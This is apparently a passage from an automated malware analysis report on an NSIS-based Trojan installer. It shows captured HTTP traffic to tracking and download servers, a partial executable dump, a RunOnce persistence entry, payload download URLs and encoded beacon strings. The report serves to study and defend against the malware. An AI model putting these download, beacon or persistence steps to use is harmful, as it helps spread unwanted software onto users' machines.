Host: data.biphysics.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx/1.8.1
Date: Fri, 29 Apr 2016 11:27:31 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.5.9-1ubuntu4.14
GET /r?_=1461929230014&pid=10732314-17&evt=IW:dlc&v=A7914D56-6726-ADB2-5C02-3742FA8A8B37 HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: data.biphysics.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 301 Moved Permanently
Server: nginx/1.8.1
Date: Fri, 29 Apr 2016 11:27:34 GMT
Content-Type: text/html
Content-Length: 184
Location: hXXp://data.biphysics.com/r/?_=1461929230014&pid=10732314-17&evt=IW:dlc&v=A7914D56-6726-ADB2-5C02-3742FA8A8B37
Connection: keep-alive
<html>..<head><title>301 Moved Permanently</title></head>..<body bgcolor="white">..<center><h1>301 Moved Permanently</h1></center>..<hr><center>nginx/1.8.1</center>..</body>..</html>..>....
GET /r/?_=1461929230014&pid=10732314-17&evt=IW:dlc&v=A7914D56-6726-ADB2-5C02-3742FA8A8B37 HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: data.biphysics.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx/1.8.1
Date: Fri, 29 Apr 2016 11:27:34 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.5.9-1ubuntu4.14
2..ok..0..HTTP/1.1 200 OK..Server: nginx/1.8.1..Date: Fri, 29 Apr 2016 11:27:34 GMT..Content-Type: text/html..Transfer-Encoding: chunked..Connection: keep-alive..X-Powered-By: PHP/5.5.9-1ubuntu4.14..2..ok..0..
GET /0.gif?2601768&101 HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: sstatic1.histats.com
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: CountUid=8e9f4111-e1ii-4571-8690-c110302ee59f
HTTP/1.1 200 OK
Date: Fri, 29 Apr 2016 11:27:34 GMT
Content-Type: image/gif
Content-Length: 43
Connection: close
GIF89a.............!.......,...........D..;..
GET /SysInfo/Validate.exe HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: download-servers.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx/1.8.0
Date: Fri, 29 Apr 2016 11:27:33 GMT
Content-Type: application/octet-stream
Content-Length: 61981
Last-Modified: Fri, 15 Apr 2016 08:03:32 GMT
Connection: keep-alive
ETag: "5710a054-f21d"
Accept-Ranges: bytes
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1..:u..iu..iu..i...iw..iu..i...i...id..i!..i...i...it..iRichu..i........................PE..L......K.................^...........0.......p....@.......................... ...............................................t...........C...........................................................................p...............................text...L\.......^.................. ..`.rdata.......p.......b..............@..@.data...X\...........v..............@....ndata...................................rsrc....C.......D...z..............@..@........................................................................................................................................................................................................................................................................................................................................................................U....\.}..t .}.F.E.u..H....h.B..H.P.u..u..u...Hr@..B...SV.5p.B..E.WP.u...Lr@..e...E..E.P.u...Pr@..}..e....Dp@........FR..VV..U... M.......M....3.....FQ.....NU..M..........VT..U.....FP..E...............E.P.M...Hp@..E...E.P.E.P.u...Tr@..u....E..9}...w....~X.te.v4..Lp@....E.tU.}.j.W.E......E.......Pp@..vXW..Tp@..u..5Xp@.W...E..E.h ...Pj.h`.B.W..Xr@..u.W...u....E.P.u...\r@._^3.[.....L$....B...Si.....VW.T.....tO.q.3.;5..B.sB..i......D.......t.G.....t...O..t .....u...3....3...F.....;5..B.r._^[...U..QQ.U.SV..i....
<<< skipped >>>
GET /0.gif?2601800&101 HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: sstatic1.histats.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Fri, 29 Apr 2016 11:27:34 GMT
Content-Type: image/gif
Content-Length: 43
Connection: close
Set-Cookie: CountUid=8e9f4111-e1ii-4571-8690-c110302ee59f; domain=.histats.com; Max-Age=31536000; Expires=Sat, 29-Apr-2017 11:27:34 GMT
GIF89a.............!.......,...........D..;..
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
Content-Length: 115
Connection: Keep-Alive
Cache-Control: no-cache
{"table": "event_has_user","data": "{\"event_event_id\": \"1726\",\"channel_id\": \"\", \"utm_addition\":\"v=2\"}"}
HTTP/1.1 200 OK
Access-Control-Allow-Methods: GET,HEAD,PUT,POST,DELETE
Access-Control-Allow-Origin: *
Content-Type: application/json; charset=utf-8
Date: Fri, 29 Apr 2016 11:27:33 GMT
Content-Length: 15
Connection: keep-alive
{"Status":"OK"}....
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
Content-Length: 126
Connection: Keep-Alive
Cache-Control: no-cache
{"table": "event_has_user","data": "{\"event_event_id\": \"1727\",\"channel_id\": \"NOCHPC\", \"utm_addition\":\"tst=&v=2\"}"}
HTTP/1.1 200 OK
Access-Control-Allow-Methods: GET,HEAD,PUT,POST,DELETE
Access-Control-Allow-Origin: *
Content-Type: application/json; charset=utf-8
Date: Fri, 29 Apr 2016 11:27:33 GMT
Content-Length: 15
Connection: keep-alive
{"Status":"OK"}HTTP/1.1 200 OK..Access-Control-Allow-Methods: GET,HEAD,PUT,POST,DELETE..Access-Control-Allow-Origin: *..Content-Type: application/json; charset=utf-8..Date: Fri, 29 Apr 2016 11:27:33 GMT..Content-Length: 15..Connection: keep-alive..{"Status":"OK"}....
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
Content-Length: 182
Connection: Keep-Alive
Cache-Control: no-cache
{"table": "event_has_user","data": "{\"event_event_id\": \"1722\",\"channel_id\": \"NOCHPC\", \"utm_addition\":\"url=hXXp://mobilitydata5.com/SysInfo/tem.php?sid=83837567483&v=2\"}"}
HTTP/1.1 200 OK
Access-Control-Allow-Methods: GET,HEAD,PUT,POST,DELETE
Access-Control-Allow-Origin: *
Content-Type: application/json; charset=utf-8
Date: Fri, 29 Apr 2016 11:27:34 GMT
Content-Length: 15
Connection: keep-alive
{"Status":"OK"}HTTP/1.1 200 OK..Access-Control-Allow-Methods: GET,HEAD,PUT,POST,DELETE..Access-Control-Allow-Origin: *..Content-Type: application/json; charset=utf-8..Date: Fri, 29 Apr 2016 11:27:34 GMT..Content-Length: 15..Connection: keep-alive..{"Status":"OK"}..
Map
The Trojan connects to the servers at the folowing location(s):
Strings from Dumps
%original file name%.exe_856:
.text
.text
`.rdata
`.rdata
@.data
@.data
.ndata
.ndata
.rsrc
.rsrc
uDSSh
uDSSh
.DEFAULT\Control Panel\International
.DEFAULT\Control Panel\International
Software\Microsoft\Windows\CurrentVersion
Software\Microsoft\Windows\CurrentVersion
GetWindowsDirectoryA
GetWindowsDirectoryA
KERNEL32.dll
KERNEL32.dll
ExitWindowsEx
ExitWindowsEx
USER32.dll
USER32.dll
GDI32.dll
GDI32.dll
SHFileOperationA
SHFileOperationA
ShellExecuteA
ShellExecuteA
SHELL32.dll
SHELL32.dll
RegEnumKeyA
RegEnumKeyA
RegCreateKeyExA
RegCreateKeyExA
RegCloseKey
RegCloseKey
RegDeleteKeyA
RegDeleteKeyA
RegOpenKeyExA
RegOpenKeyExA
ADVAPI32.dll
ADVAPI32.dll
COMCTL32.dll
COMCTL32.dll
ole32.dll
ole32.dll
VERSION.dll
VERSION.dll
verifying installer: %d%%
verifying installer: %d%%
unpacking data: %d%%
unpacking data: %d%%
... %d%%
... %d%%
hXXp://nsis.sf.net/NSIS_Error
hXXp://nsis.sf.net/NSIS_Error
~nsu.tmp
~nsu.tmp
%u.%u%s%s
%u.%u%s%s
RegDeleteKeyExA
RegDeleteKeyExA
%s=%s
%s=%s
*?|/":
*?|/":
~1\"%CurrentUserName%"\LOCALS~1\Temp\nsw18.tmp
~1\"%CurrentUserName%"\LOCALS~1\Temp\nsw18.tmp
netc.dll
netc.dll
0732314-17&evt=IW:dlc&v=A7914D56-6726-ADB2-5C02-3742FA8A8B37
0732314-17&evt=IW:dlc&v=A7914D56-6726-ADB2-5C02-3742FA8A8B37
Xt7aHR0cDovL2QzODltNGw1YjV3bGNiLmNsb3VkZnJvbnQubmV0L2FwbHBtb3YuaHRtbD9jaD1hcF8xMDAmYXV0bz0xJmRwPS1fLVpHUTRNVjgwTkY4eE5EWXlYekUwT0RGZlEwRmZNVGMwTGpnNUxqazVMakV3Tmw5bVlXVmZOelU0Tmw5QlJGTS1fLUxxT1B0bWJmc3d0enZ3YkVxU2Fpb2FGY2JHZmFfRlNhRHphay1WX19KRWJhQWRkWXB2c3RHbW4xeVFPcmdhS3JKV3EwT3FjOTB0WTBidGVkSnlNQU1hSk1ucWluaUFiaWFPYTAwYWRhamtVbmprTFF3RF82ZUxRNkxEcVo4azhRUG13M3RxUGJJb25YeUhKYWxVZzZiT0d3amprYnNpaGU1MGdLU21tcXRIdXd6MzIxTUxBSTNrS2lFYkFCYjJsdWNJSWVwc01HYWh3THNteXpQVmJ3SUp0SGJPQmdHR1NnWFpqTmlDSWV4emZzSDFmcnE3c0hiSTNuRGpTNTZuTGZaMkNSS0kxSmZreFh3MHU4N3ZvSmsxeXFKWjRqaGVmRUFiZlJLeFU4WlJ6Y1lpc01HTF95T2wzemFuRVZYSG5tMHNMb3VzOTZZZTA2SVZtTVk4azByY0dHZU9JaTBxbXNrcTQyY2MwTUtSS0Jzam1XMzdib3BvYmdFcjBlZmpuV3FmelFwaG5mc1htRVFha2Q4YVhyTXBXUFVHdG5GN043Zl9qM29mY2Z2cWc0YVhHfX0=&v=A7914D56-6726-ADB2-5C02-3742FA8A8B37
Xt7aHR0cDovL2QzODltNGw1YjV3bGNiLmNsb3VkZnJvbnQubmV0L2FwbHBtb3YuaHRtbD9jaD1hcF8xMDAmYXV0bz0xJmRwPS1fLVpHUTRNVjgwTkY4eE5EWXlYekUwT0RGZlEwRmZNVGMwTGpnNUxqazVMakV3Tmw5bVlXVmZOelU0Tmw5QlJGTS1fLUxxT1B0bWJmc3d0enZ3YkVxU2Fpb2FGY2JHZmFfRlNhRHphay1WX19KRWJhQWRkWXB2c3RHbW4xeVFPcmdhS3JKV3EwT3FjOTB0WTBidGVkSnlNQU1hSk1ucWluaUFiaWFPYTAwYWRhamtVbmprTFF3RF82ZUxRNkxEcVo4azhRUG13M3RxUGJJb25YeUhKYWxVZzZiT0d3amprYnNpaGU1MGdLU21tcXRIdXd6MzIxTUxBSTNrS2lFYkFCYjJsdWNJSWVwc01HYWh3THNteXpQVmJ3SUp0SGJPQmdHR1NnWFpqTmlDSWV4emZzSDFmcnE3c0hiSTNuRGpTNTZuTGZaMkNSS0kxSmZreFh3MHU4N3ZvSmsxeXFKWjRqaGVmRUFiZlJLeFU4WlJ6Y1lpc01HTF95T2wzemFuRVZYSG5tMHNMb3VzOTZZZTA2SVZtTVk4azByY0dHZU9JaTBxbXNrcTQyY2MwTUtSS0Jzam1XMzdib3BvYmdFcjBlZmpuV3FmelFwaG5mc1htRVFha2Q4YVhyTXBXUFVHdG5GN043Zl9qM29mY2Z2cWc0YVhHfX0=&v=A7914D56-6726-ADB2-5C02-3742FA8A8B37
Software\Microsoft\Windows\CurrentVersion\RunOnce
Software\Microsoft\Windows\CurrentVersion\RunOnce
r.dll
r.dll
nstall.exe
nstall.exe
%Documents and Settings%\%current user%\Application Data\InstallW\Full_Setup.exe /runonce
%Documents and Settings%\%current user%\Application Data\InstallW\Full_Setup.exe /runonce
DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsd3.tmp\inetc.dll
DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsd3.tmp\inetc.dll
or.dll
or.dll
OLEAUT32.dll
OLEAUT32.dll
GetProcessHeap
GetProcessHeap
GetCPInfo
GetCPInfo
GetConsoleOutputCP
GetConsoleOutputCP
IpConfig.dll
IpConfig.dll
zcÃ
zcÃ
L%sDL'y
L%sDL'y
qk.RQk
qk.RQk
1ve%s
1ve%s
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsw18.tmp
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsw18.tmp
nsw18.tmp
nsw18.tmp
aed3248e8f04ac2affda17.exe
aed3248e8f04ac2affda17.exe
2C7DF~1.EXE
2C7DF~1.EXE
ments and Settings\"%CurrentUserName%"\Application Data\InstallW\Full_Setup.exe /runonce
ments and Settings\"%CurrentUserName%"\Application Data\InstallW\Full_Setup.exe /runonce
6-6726-ADB2-5C02-3742FA8A8B37
6-6726-ADB2-5C02-3742FA8A8B37
tNGw1YjV3bGNiLmNsb3VkZnJvbnQubmV0L2FwbHBtb3YuaHRtbD9jaD1hcF8xMDAmYXV0bz0xJmRwPS1fLVpHUTRNVjgwTkY4eE5EWXlYekUwT0RGZlEwRmZNVGMwTGpnNUxqazVMakV3Tmw5bVlXVmZOelU0Tmw5QlJGTS1fLUxxT1B0bWJmc3d0enZ3YkVxU2Fpb2FGY2JHZmFfRlNhRHphay1WX19KRWJhQWRkWXB2c3RHbW4xeVFPcmdhS3JKV3EwT3FjOTB0WTBidGVkSnlNQU1hSk1ucWluaUFiaWFPYTAwYWRhamtVbmprTFF3RF82ZUxRNkxEcVo4azhRUG13M3RxUGJJb25YeUhKYWxVZzZiT0d3amprYnNpaGU1MGdLU21tcXRIdXd6MzIxTUxBSTNrS2lFYkFCYjJsdWNJSWVwc01HYWh3THNteXpQVmJ3SUp0SGJPQmdHR1NnWFpqTmlDSWV4emZzSDFmcnE3c0hiSTNuRGpTNTZuTGZaMkNSS0kxSmZreFh3MHU4N3ZvSmsxeXFKWjRqaGVmRUFiZlJLeFU4WlJ6Y1lpc01HTF95T2wzemFuRVZYSG5tMHNMb3VzOTZZZTA2SVZtTVk4azByY0dHZU9JaTBxbXNrcTQyY2MwTUtSS0Jzam1XMzdib3BvYmdFcjBlZmpuV3FmelFwaG5mc1htRVFha2Q4YVhyTXBXUFVHdG5GN043Zl9qM29mY2Z2cWc0YVhHfX0=
tNGw1YjV3bGNiLmNsb3VkZnJvbnQubmV0L2FwbHBtb3YuaHRtbD9jaD1hcF8xMDAmYXV0bz0xJmRwPS1fLVpHUTRNVjgwTkY4eE5EWXlYekUwT0RGZlEwRmZNVGMwTGpnNUxqazVMakV3Tmw5bVlXVmZOelU0Tmw5QlJGTS1fLUxxT1B0bWJmc3d0enZ3YkVxU2Fpb2FGY2JHZmFfRlNhRHphay1WX19KRWJhQWRkWXB2c3RHbW4xeVFPcmdhS3JKV3EwT3FjOTB0WTBidGVkSnlNQU1hSk1ucWluaUFiaWFPYTAwYWRhamtVbmprTFF3RF82ZUxRNkxEcVo4azhRUG13M3RxUGJJb25YeUhKYWxVZzZiT0d3amprYnNpaGU1MGdLU21tcXRIdXd6MzIxTUxBSTNrS2lFYkFCYjJsdWNJSWVwc01HYWh3THNteXpQVmJ3SUp0SGJPQmdHR1NnWFpqTmlDSWV4emZzSDFmcnE3c0hiSTNuRGpTNTZuTGZaMkNSS0kxSmZreFh3MHU4N3ZvSmsxeXFKWjRqaGVmRUFiZlJLeFU4WlJ6Y1lpc01HTF95T2wzemFuRVZYSG5tMHNMb3VzOTZZZTA2SVZtTVk4azByY0dHZU9JaTBxbXNrcTQyY2MwTUtSS0Jzam1XMzdib3BvYmdFcjBlZmpuV3FmelFwaG5mc1htRVFha2Q4YVhyTXBXUFVHdG5GN043Zl9qM29mY2Z2cWc0YVhHfX0=
mY2Z2cWc0YVhHfX0=&v=A7914D56-6726-ADB2-5C02-3742FA8A8B37
mY2Z2cWc0YVhHfX0=&v=A7914D56-6726-ADB2-5C02-3742FA8A8B37
sb3VkZnJvbnQubmV0L2FwbHBtb3YuaHRtbD9jaD1hcF8xMDAmYXV0bz0xJmRwPS1fLVpHUTRNVjgwTkY4eE5EWXlYekUwT0RGZlEwRmZNVGMwTGpnNUxqazVMakV3Tmw5bVlXVmZOelU0Tmw5QlJGTS1fLUxxT1B0bWJmc3d0enZ3YkVxU2Fpb2FGY2JHZmFfRlNhRHphay1WX19KRWJhQWRkWXB2c3RHbW4xeVFPcmdhS3JKV3EwT3FjOTB0WTBidGVkSnlNQU1hSk1ucWluaUFiaWFPYTAwYWRhamtVbmprTFF3RF82ZUxRNkxEcVo4azhRUG13M3RxUGJJb25YeUhKYWxVZzZiT0d3amprYnNpaGU1MGdLU21tcXRIdXd6MzIxTUxBSTNrS2lFYkFCYjJsdWNJSWVwc01HYWh3THNteXpQVmJ3SUp0SGJPQmdHR1NnWFpqTmlDSWV4emZzSDFmcnE3c0hiSTNuRGpTNTZuTGZaMkNSS0kxSmZreFh3MHU4N3ZvSmsxeXFKWjRqaGVmRUFiZlJLeFU4WlJ6Y1lpc01HTF95T2wzemFuRVZYSG5tMHNMb3VzOTZZZTA2SVZtTVk4azByY0dHZU9JaTBxbXNrcTQyY2MwTUtSS0Jzam1XMzdib3BvYmdFcjBlZmpuV3FmelFwaG5mc1htRVFha2Q4YVhyTXBXUFVHdG5GN043Zl9qM29mY2Z2cWc0YVhHfX0=
sb3VkZnJvbnQubmV0L2FwbHBtb3YuaHRtbD9jaD1hcF8xMDAmYXV0bz0xJmRwPS1fLVpHUTRNVjgwTkY4eE5EWXlYekUwT0RGZlEwRmZNVGMwTGpnNUxqazVMakV3Tmw5bVlXVmZOelU0Tmw5QlJGTS1fLUxxT1B0bWJmc3d0enZ3YkVxU2Fpb2FGY2JHZmFfRlNhRHphay1WX19KRWJhQWRkWXB2c3RHbW4xeVFPcmdhS3JKV3EwT3FjOTB0WTBidGVkSnlNQU1hSk1ucWluaUFiaWFPYTAwYWRhamtVbmprTFF3RF82ZUxRNkxEcVo4azhRUG13M3RxUGJJb25YeUhKYWxVZzZiT0d3amprYnNpaGU1MGdLU21tcXRIdXd6MzIxTUxBSTNrS2lFYkFCYjJsdWNJSWVwc01HYWh3THNteXpQVmJ3SUp0SGJPQmdHR1NnWFpqTmlDSWV4emZzSDFmcnE3c0hiSTNuRGpTNTZuTGZaMkNSS0kxSmZreFh3MHU4N3ZvSmsxeXFKWjRqaGVmRUFiZlJLeFU4WlJ6Y1lpc01HTF95T2wzemFuRVZYSG5tMHNMb3VzOTZZZTA2SVZtTVk4azByY0dHZU9JaTBxbXNrcTQyY2MwTUtSS0Jzam1XMzdib3BvYmdFcjBlZmpuV3FmelFwaG5mc1htRVFha2Q4YVhyTXBXUFVHdG5GN043Zl9qM29mY2Z2cWc0YVhHfX0=
1 2 3 4 5 6 7 8 9 10 11
1 2 3 4 5 6 7 8 9 10 11
tion Data\InstallW\Full_Setup.exe
tion Data\InstallW\Full_Setup.exe
tp://data.biphysics.com/r?_=1461929230014&pid=10732314-17&evt=IW:dlc&v=A7914D56-6726-ADB2-5C02-3742FA8A8B37
tp://data.biphysics.com/r?_=1461929230014&pid=10732314-17&evt=IW:dlc&v=A7914D56-6726-ADB2-5C02-3742FA8A8B37
3 4 5 6 7 8 9 10 11
3 4 5 6 7 8 9 10 11
DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsw18.tmp
DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsw18.tmp
c:\%original file name%.exe
c:\%original file name%.exe
%Documents and Settings%\%current user%\Application Data\InstallW
%Documents and Settings%\%current user%\Application Data\InstallW
%original file name%.exe
%original file name%.exe
CUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsn1.tmp
CUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsn1.tmp
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsd3.tmp
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsd3.tmp
10732314-17
10732314-17
dXJsPXt7aHR0cDovL2QzODltNGw1YjV3bGNiLmNsb3VkZnJvbnQubmV0L2FwbHBtb3YuaHRtbD9jaD1hcF8xMDAmYXV0bz0xJmRwPS1fLVpHUTRNVjgwTkY4eE5EWXlYekUwT0RGZlEwRmZNVGMwTGpnNUxqazVMakV3Tmw5bVlXVmZOelU0Tmw5QlJGTS1fLUxxT1B0bWJmc3d0enZ3YkVxU2Fpb2FGY2JHZmFfRlNhRHphay1WX19KRWJhQWRkWXB2c3RHbW4xeVFPcmdhS3JKV3EwT3FjOTB0WTBidGVkSnlNQU1hSk1ucWluaUFiaWFPYTAwYWRhamtVbmprTFF3RF82ZUxRNkxEcVo4azhRUG13M3RxUGJJb25YeUhKYWxVZzZiT0d3amprYnNpaGU1MGdLU21tcXRIdXd6MzIxTUxBSTNrS2lFYkFCYjJsdWNJSWVwc01HYWh3THNteXpQVmJ3SUp0SGJPQmdHR1NnWFpqTmlDSWV4emZzSDFmcnE3c0hiSTNuRGpTNTZuTGZaMkNSS0kxSmZreFh3MHU4N3ZvSmsxeXFKWjRqaGVmRUFiZlJLeFU4WlJ6Y1lpc01HTF95T2wzemFuRVZYSG5tMHNMb3VzOTZZZTA2SVZtTVk4azByY0dHZU9JaTBxbXNrcTQyY2MwTUtSS0Jzam1XMzdib3BvYmdFcjBlZmpuV3FmelFwaG5mc1htRVFha2Q4YVhyTXBXUFVHdG5GN043Zl9qM29mY2Z2cWc0YVhHfX0=
dXJsPXt7aHR0cDovL2QzODltNGw1YjV3bGNiLmNsb3VkZnJvbnQubmV0L2FwbHBtb3YuaHRtbD9jaD1hcF8xMDAmYXV0bz0xJmRwPS1fLVpHUTRNVjgwTkY4eE5EWXlYekUwT0RGZlEwRmZNVGMwTGpnNUxqazVMakV3Tmw5bVlXVmZOelU0Tmw5QlJGTS1fLUxxT1B0bWJmc3d0enZ3YkVxU2Fpb2FGY2JHZmFfRlNhRHphay1WX19KRWJhQWRkWXB2c3RHbW4xeVFPcmdhS3JKV3EwT3FjOTB0WTBidGVkSnlNQU1hSk1ucWluaUFiaWFPYTAwYWRhamtVbmprTFF3RF82ZUxRNkxEcVo4azhRUG13M3RxUGJJb25YeUhKYWxVZzZiT0d3amprYnNpaGU1MGdLU21tcXRIdXd6MzIxTUxBSTNrS2lFYkFCYjJsdWNJSWVwc01HYWh3THNteXpQVmJ3SUp0SGJPQmdHR1NnWFpqTmlDSWV4emZzSDFmcnE3c0hiSTNuRGpTNTZuTGZaMkNSS0kxSmZreFh3MHU4N3ZvSmsxeXFKWjRqaGVmRUFiZlJLeFU4WlJ6Y1lpc01HTF95T2wzemFuRVZYSG5tMHNMb3VzOTZZZTA2SVZtTVk4azByY0dHZU9JaTBxbXNrcTQyY2MwTUtSS0Jzam1XMzdib3BvYmdFcjBlZmpuV3FmelFwaG5mc1htRVFha2Q4YVhyTXBXUFVHdG5GN043Zl9qM29mY2Z2cWc0YVhHfX0=
%Documents and Settings%\%current user%\Application Data\InstallW\Full_Setup.exe
%Documents and Settings%\%current user%\Application Data\InstallW\Full_Setup.exe
)-.Yln
)-.Yln
Nullsoft Install System v2.46
Nullsoft Install System v2.46
1.0.0.0
1.0.0.0
nsoA.tmp_240:
.text
.text
`.rdata
`.rdata
@.data
@.data
.ndata
.ndata
.rsrc
.rsrc
uDSSh
uDSSh
.DEFAULT\Control Panel\International
.DEFAULT\Control Panel\International
Software\Microsoft\Windows\CurrentVersion
Software\Microsoft\Windows\CurrentVersion
GetWindowsDirectoryA
GetWindowsDirectoryA
KERNEL32.dll
KERNEL32.dll
ExitWindowsEx
ExitWindowsEx
USER32.dll
USER32.dll
GDI32.dll
GDI32.dll
SHFileOperationA
SHFileOperationA
ShellExecuteA
ShellExecuteA
SHELL32.dll
SHELL32.dll
RegEnumKeyA
RegEnumKeyA
RegCreateKeyExA
RegCreateKeyExA
RegCloseKey
RegCloseKey
RegDeleteKeyA
RegDeleteKeyA
RegOpenKeyExA
RegOpenKeyExA
ADVAPI32.dll
ADVAPI32.dll
COMCTL32.dll
COMCTL32.dll
ole32.dll
ole32.dll
VERSION.dll
VERSION.dll
verifying installer: %d%%
verifying installer: %d%%
unpacking data: %d%%
unpacking data: %d%%
... %d%%
... %d%%
hXXp://nsis.sf.net/NSIS_Error
hXXp://nsis.sf.net/NSIS_Error
~nsu.tmp
~nsu.tmp
%u.%u%s%s
%u.%u%s%s
RegDeleteKeyExA
RegDeleteKeyExA
%s=%s
%s=%s
*?|/":
*?|/":
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsg16.tmp
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsg16.tmp
360TotalSecurity.exe
360TotalSecurity.exe
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsu10.tmp\inetc.dll
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsu10.tmp\inetc.dll
hXXp://mobilitydata5.com/SysInfo/tem.php?sid=83837567483
hXXp://mobilitydata5.com/SysInfo/tem.php?sid=83837567483
hXXp://download-servers.com/partners/360/360TotalSecurity.exe
hXXp://download-servers.com/partners/360/360TotalSecurity.exe
%s - %s
%s - %s
(Err=%d)
(Err=%d)
NSIS_Inetc (Mozilla)
NSIS_Inetc (Mozilla)
Filename: %s
Filename: %s
/password
/password
Uploading %s
Uploading %s
8!8-8B8I8}8
8!8-8B8I8}8
@.reloc
@.reloc
HttpSendRequestA
HttpSendRequestA
HttpSendRequestExA
HttpSendRequestExA
HttpQueryInfoA
HttpQueryInfoA
FtpCreateDirectoryA
FtpCreateDirectoryA
FtpOpenFileA
FtpOpenFileA
HttpOpenRequestA
HttpOpenRequestA
HttpAddRequestHeadersA
HttpAddRequestHeadersA
HttpEndRequestA
HttpEndRequestA
InternetCrackUrlA
InternetCrackUrlA
WININET.dll
WININET.dll
inetc.dll
inetc.dll
Open URL Error
Open URL Error
%dkB (%d%%) of %dkB @ %d.dkB/s
%dkB (%d%%) of %dkB @ %d.dkB/s
(%d %s%s remaining)
(%d %s%s remaining)
REST %d
REST %d
SIZE %s
SIZE %s
Content-Length: %d
Content-Length: %d
Content-Type: application/x-www-form-urlencoded
Content-Type: application/x-www-form-urlencoded
Authorization: basic %s
Authorization: basic %s
Proxy-authorization: basic %s
Proxy-authorization: basic %s
%s:%s
%s:%s
FtpCommandA
FtpCommandA
wininet.dll
wininet.dll
%u MB
%u MB
%u kB
%u kB
%u bytes
%u bytes
%d:d:d
%d:d:d
u.Uj@
u.Uj@
MSVCRT.dll
MSVCRT.dll
URL Parts Error
URL Parts Error
FtpCreateDir failed (550)
FtpCreateDir failed (550)
Error FTP path (550)
Error FTP path (550)
Downloading %s
Downloading %s
%UXn5
%UXn5
.jL J
.jL J
#vWeB0,
#vWeB0,
.qo8KT
.qo8KT
kRV%D
kRV%D
>aO.nF
>aO.nF
k%UO^
k%UO^
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsb19.tmp
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsb19.tmp
nsb19.tmp
nsb19.tmp
://livestatscounter.com/Generic/vos.php?ch=
://livestatscounter.com/Generic/vos.php?ch=
CUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsoA.tmp /idn
CUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsoA.tmp /idn
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsg16.tmp
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsg16.tmp
Uninstall.exe
Uninstall.exe
n.php?r=vu_vo2_
n.php?r=vu_vo2_
mobilitydata5.com/SysInfo/tem.php?sid=83837567483
mobilitydata5.com/SysInfo/tem.php?sid=83837567483
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsoA.tmp /idn
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsoA.tmp /idn
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp
nsoA.tmp
nsoA.tmp
CUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsoE.tmp
CUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsoE.tmp
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsu10.tmp
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsu10.tmp
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsoA.tmp
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsoA.tmp
{"table": "event_has_user","data": "{\"event_event_id\": \"1722\",\"channel_id\": \"NOCHPC\", \"utm_addition\":\"url=hXXp://mobilitydata5.com/SysInfo/tem.php?sid=83837567483&v=2\"}"}
{"table": "event_has_user","data": "{\"event_event_id\": \"1722\",\"channel_id\": \"NOCHPC\", \"utm_addition\":\"url=hXXp://mobilitydata5.com/SysInfo/tem.php?sid=83837567483&v=2\"}"}
hXXp://ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
hXXp://ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
url=hXXp://mobilitydata5.com/SysInfo/tem.php?sid=83837567483
url=hXXp://mobilitydata5.com/SysInfo/tem.php?sid=83837567483
